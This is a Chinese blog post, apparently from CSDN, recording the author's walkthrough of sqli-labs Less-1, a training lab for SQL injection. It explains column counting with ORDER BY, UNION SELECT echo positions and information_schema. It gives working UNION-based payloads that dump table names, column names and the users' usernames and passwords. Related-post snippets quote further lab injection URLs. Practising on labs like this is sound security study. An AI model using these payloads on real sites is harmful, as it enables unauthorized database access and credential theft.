sqlilabs-1(闯关记录)

最新推荐文章于 2024-07-13 10:38:18 发布
最新推荐文章于 2024-07-13 10:38:18 发布
阅读量2.5k 收藏
点赞数
文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52642385/article/details/124327095
版权

默认已经掌握流程,主要疏通一下自己未曾理解的点

①:order by: 是进行排序的意思,将数据库里面的元素进行排序

order by 1:根据第一列中的数据进行排

如果要是不存在指定列就会报错,因此可以用来进行报字段,即列数

②:关于union select 1,2,3:这里由于数据库的特性,一张mysql执行语句图片即可说明:

 因此,如果让对应id进行错误查询,即赋值为-1,就可以在对应位置回显相应的数字信息。至于回显哪几个数字,我想应该和源代码有关系,就比如本题源代码,是处理了相应的password和username:

 ③:在进行收集信息的时候注意mysql高版本自带的一个数据库 information_schema

同时还有几个需要注意的:

Information_schema.columns:记录所有列名信息的表

Information_schema.tables:记录所有表名信息的表 

Table_name:表名

Column_name:列名

Table_schema:数据库名

④:通过查询到数据库名可以构造payload来进行获取更多的信息:

查询指定数据库下的所有表名:

Union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=’security’--+

接着查询指定数据库下所有列名:

Union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’user’--+  (这个引号注意一下,直接赋值粘贴不行)

由列名进行推导,猜测指定列

Union select 1,group_concat(username),group_concat(password) from security.users--+

⑤:闯关成功!!!

X也总
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli labs 1
yy2013
10-07 319
sqli lbas 1 数据库是mysqlsql 查询语句 : sql="SELECT∗FROMusersWHEREid=′sql="SELECT * FROM users WHERE id='id’ LIMIT 0,1”;在index.php?id=,构造可能的sql语句,通过判断是否存在sql注入sql语句 中的注释: – (注意要空格%20 或者是在后面写+) 1.
sqli-labs学习记录(一)
csu_vc的博客
09-30 1015
0x01 less-1‘$id’ 单引号注入这里写代码片http://localhost/sqli-labs-master/Less-1/?id=14' order by 3-- + //猜字段http://localhost/sqli-labs-master/Less-1/?id=14' union select 1,2,3-- + //查看内容 发现服务器依旧只返回了第一条查询的信息,
sqli-labs 1~4关详解
qq_45756971的博客
10-15 486
点进去题目:提示我们输入题目id,第一题,所以我们输入?id=1,回车即可。如图:首先可以判断这里接受的是一个GET请求,先在1后面加一个’ 发现报错,说明这里没有过滤掉引号,所以这里是一个注入点 SQL注入通常有两种类型,整形注入和字符型注入,那么我们要判断这是哪种注入就要分析这里的报错语句,报错信息中共有5个单引号,"实际上是两个单引号,最外面的两个是报错信息的提示引号,'1’两边的引号是后台代码的引号,多出来的就是我们加上的,因为这里给输入的1加上了引号所以后台接受的是字符型,那么我们在后续的注入中需
sqlilabs第一关懵逼小解答
zlloveyouforever的博客
03-13 4882
sqlilabs第一关新手大解惑,小白看过来,大佬不要来。绝对很详细哦,骗你是修勾。
sqli-labs闯关指南 1—10
热门推荐
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一关1.经过语句and 1=2...
sqli-labs闯关记录(1~65关)
qq_62540010的博客
01-04 3645
sql漏洞闯关记录笔记(1~15) 1.基本知识 首先我们先了解SQL注入是什么: SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一,其实就是恶意用户通过在可提交给数据库的地方写入恶意代码,将数据库的数据提取出来。. 2.工具 在1~15关,我们要用到hacbar,burpsuit,中国蚁剑,并且我用的是phpstudy2018来配置的Apache和mysql. 3.less 1,2,3,4 之所以把1234关一起破解,是因为它们属于同一类型,下面我们来看一看他们的不同
sqlilabs 1-20闯关记录
m0_63253040的博客
04-08 4406
sqlilabs1-20关wp Less-7 msql传马 今天看wp,研究了一下判断整数型字符型的原理 感觉一种是根据回显的报错判断,另一种就是想办法拿到源代码,直接看语句判断 这里整形就是没有引号和括号包裹的,字符型就是由单双引号和括号组合包裹 整形的判断另外有方法 可以看之前的博客我现在不愿找 字符型判断 直接分别输入单双引号,报错则是该引号包裹 然后再测试括号后面一个括号一个括号加,记得加上注释,不报错的时候就对了 这题第七关则是一个单引号加上两个括号')) 然后这题
sqli-labs1-10关闯关心得与思路
m0_48294281的博客
03-08 6106
sqli-labs 1-11关闯关个人心得,欢迎交流指正。
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
技术笔记
07-12 458
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
【postgresql】视图(View)
一个写了10年bug的程序员日常笔记。
07-10 548
PostgreSQL 中的视图(View)是一种虚拟表,其内容由 SQL 查询定义。视图可以简化复杂的 SQL 操作,使得用户能够以一种更直观、更易于理解的方式来访问和操作数据。PostgreSQL 视图是只读的,因此可能无法在视图上执行 DELETE、INSERT 或 UPDATE 语句。但是可以在视图上创建一个触发器,当尝试 DELETE、INSERT 或 UPDATE 视图时触发,需要做的动作在触发器内容中定义。
[高频 SQL 50 题(基础版)]第一千七百五十七题,可回收且低脂产品
weixin_45201305的博客
07-10 271
low_fats 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品是低脂产品,'N' 表示不是低脂产品。recyclable 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品可回收,而 'N' 表示不可回收。没什么难度,作为基础题五十题的第一题练手,现在也开始陆续写一些SQL,作为记录,和leetcode一起,大家都加油。编写解决方案找出既是低脂又是可回收的产品编号。是该表的主键(具有唯一值的列)。
MySQL 进阶(三)【SQL 优化】
最新发布
梦想是动物管理员
07-13 636
MySQL SQL 优化
SQL Server设置端口:跨平台指南
招风的黑耳CSDN
07-09 594
在使用SQL Server时,设置或修改其监听的端口是确保数据库服务安全访问和高效管理的重要步骤。由于SQL Server可以部署在多种操作系统上,包括Windows、Linux和Docker容器等,因此设置端口的步骤和方法也会因平台而异。本文将为您提供一个跨平台的指南,帮助您在不同环境下设置SQL Server的端口。
PostgreSQL 中如何实现数据的增量更新和全量更新的平衡?
技术笔记
07-09 946
在数据库管理中,数据的更新操作是常见的任务。对于大型数据集或高并发的系统,选择合适的更新策略至关重要。增量更新和全量更新是两种常见的数据更新方式,如何在 PostgreSQL 中平衡这两种更新方式以确保数据的一致性、性能和可靠性是一个值得深入探讨的问题。
PostgreSQL 中如何解决因频繁的小事务导致的性能下降?
技术笔记
07-13 705
这样可以减少事务的数量,降低系统的开销。例如,在一个电商系统中,如果每次用户添加一个商品到购物车都被设计为一个单独的事务,而不是在一定时间内批量处理,那么就会产生大量的小事务。对于一些非关键的、对实时性要求不高的操作,可以将其放入异步任务队列中,在后台进行处理,避免阻塞主事务的执行。以上只是一些常见的解决方法,实际情况可能更加复杂,需要综合考虑应用程序的架构、业务需求和数据库的特点来制定最适合的解决方案。比如,发送订单确认邮件这样的操作,就可以在事务完成后,将任务放入异步队列,由专门的工作进程在后台处理。
sqli-labs-master 闯关游戏
03-16
sqli-labs-master是一款用于学习SQL注入攻击技巧的闯关游戏,其中包含了若干关卡,每个关卡都涉及到了不同类型的SQL注入攻击。通过玩这个游戏,玩家可以学到如何识别和防御SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值